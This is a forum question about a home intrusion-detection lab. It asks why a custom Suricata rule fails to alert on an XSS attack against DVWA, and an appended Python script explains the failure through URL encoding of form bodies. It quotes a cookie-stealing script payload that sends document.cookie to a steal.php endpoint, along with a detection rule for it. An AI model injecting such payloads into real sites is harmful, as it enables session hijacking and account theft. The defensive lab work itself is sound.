Good day everyone,
My Suricata is currently installed in my Azure Kali Linux VM, and inside the VM is a website, which is GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA). I have a second attacker Kali Linux VM which accesses the website and injects this script into a comment box to simulate an attack:
<script>document.location='127.0.0.1/steal.php?cookie='+document.cookie;<script>
My Suricata is configured to my VM's eth0 IP since the website is on localhost, and stream checksum validation is off because it was generating an error in my fast.log file before. I can see the website traffic in the eve.json file and I can see that no packets are being lost in the stat.log, but it's not alerting me. I have this one rule configured to catch that one specific attack, but it's not working:
alert http any any -> $HOME_NET any (msg:"Attempted cookie theft using JavaScript"; content:"document.location="; nocase; http_client_body; content:"steal.php?cookie="; nocase; http_client_body; content:"document.cookie"; nocase; http_client_body; classtype:web-application-attack; sid:1999991; rev:1;)
What is wrong with my rule or system?
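One thing worth checking, added here as an example and not part of the original post: `http_client_body` inspects the raw request body, and a plain HTML form POST sends it as application/x-www-form-urlencoded, so characters such as `=`, `?` and `<` arrive percent-encoded. The script below (assuming the comment is submitted by an ordinary form; the field names `name` and `message` are constructed) builds that body and reports which of the rule's content strings are present in the raw bytes Suricata compares against, versus in the decoded text.

```python
import re
from urllib.parse import urlencode, unquote_plus

# The rule from the post, with straight quotes.
RULE = (
    'alert http any any -> $HOME_NET any ('
    'msg:"Attempted cookie theft using JavaScript"; '
    'content:"document.location="; nocase; http_client_body; '
    'content:"steal.php?cookie="; nocase; http_client_body; '
    'content:"document.cookie"; nocase; http_client_body; '
    'classtype:web-application-attack; sid:1999991; rev:1;)'
)

# Constructed form fields; the message is the payload quoted in the post.
COMMENT_FORM = {
    "name": "tester",
    "message": "<script>document.location='127.0.0.1/steal.php?cookie='"
               "+document.cookie;<script>",
}


def rule_contents(rule: str) -> list[str]:
    """Return the quoted content:"..." strings of a Suricata rule, in order."""
    return re.findall(r'content:"([^"]*)"', rule)


def form_body(fields: dict) -> str:
    """Body a browser sends for <form method="post"> (x-www-form-urlencoded)."""
    return urlencode(fields)


def check_rule(rule: str, fields: dict) -> dict:
    """For each content string, say whether it occurs in the raw body that
    http_client_body matches on, and in the percent-decoded body. Both sides are
    lower-cased to emulate the rule's nocase keyword."""
    raw = form_body(fields).lower()
    decoded = unquote_plus(raw)
    report = {}
    for needle in rule_contents(rule):
        needle = needle.lower()
        report[needle] = {"raw": needle in raw, "decoded": needle in decoded}
    return report


def rule_would_fire(rule: str, fields: dict) -> bool:
    """All content matches on one rule must hit the raw body for it to alert."""
    return all(hit["raw"] for hit in check_rule(rule, fields).values())


if __name__ == "__main__":
    for needle, hit in check_rule(RULE, COMMENT_FORM).items():
        print(f"{needle!r}: raw={hit['raw']} decoded={hit['decoded']}")
    print("rule would fire:", rule_would_fire(RULE, COMMENT_FORM))
```

Running it shows that only `document.cookie` survives encoding untouched; the two strings containing `=` and `?` are not present in the raw body, so all three content matches cannot succeed together on a form-submitted comment.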